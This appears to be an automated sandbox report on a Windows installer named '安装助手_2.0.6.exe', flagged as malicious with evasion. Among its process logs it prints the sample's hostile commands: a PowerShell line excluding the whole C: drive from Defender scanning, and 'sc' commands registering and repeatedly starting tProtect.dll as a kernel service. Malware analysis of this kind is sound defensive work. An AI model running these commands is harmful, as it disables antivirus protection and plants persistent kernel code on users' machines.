Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: String function: 6C0F9240 appears 53 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007FABA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000000.2064220108.0000000000629000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.drBinary string: \Device\TfSysMon
Source: tProtect.dll.13.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal84.evad.winEXE@138/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C0C5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00569313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_00569313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00573D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00573D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00569252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_00569252
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,7_2_6C0C5240
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\is-DDM97.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2408:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1988:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2452:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
